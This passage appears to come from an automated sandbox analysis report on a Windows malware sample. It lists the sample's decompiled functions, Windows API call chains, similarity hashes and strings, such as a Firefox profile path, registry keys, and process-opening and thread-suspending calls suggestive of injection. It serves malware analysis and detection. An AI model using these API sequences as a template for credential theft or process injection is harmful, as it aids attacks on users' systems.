  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
